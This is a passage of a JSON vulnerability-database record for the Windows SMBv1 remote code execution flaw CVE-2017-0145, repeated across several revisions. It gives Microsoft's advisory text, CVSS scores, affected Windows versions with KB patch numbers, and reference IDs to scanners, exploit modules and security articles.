["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012215", "KB4014077", "KB3177186", "KBMS16-110, 3187754", "KB3205409", "KB3210720", "KB3213986", "KB3205401", "KB4013198", "KB4012598", "KB4012212", "KB3212646", "KB3210721", "KB4012217", "KB4012606", "KB4012214", "KB4012216", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T08:57:08", "differentElements": ["msAffectedSoftware"], "edition": 74}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-21T10:46:37", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KBMS16-110, 3187754", "KB4013198", "KB3210721", "KB4012214", "KB4012217", "KB4013429", "KB3213986", "KB4012212", "KB4012606", "KB4012216", "KB4014077", "KB3210720", "KB3177186", "KB3205409", "KB3212646", "KB3205401", "KB4012598", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T10:46:37", "differentElements": ["msAffectedSoftware"], "edition": 75}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-25T23:09:38", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012598", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB4013198", "KBMS16-110, 3187754", "KB4012216", "KB4014077", "KB3177186", "KB4012606", "KB3210721", "KB4012217", "KB3205409", "KB3210720", "KB4013429", "KB3212646", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 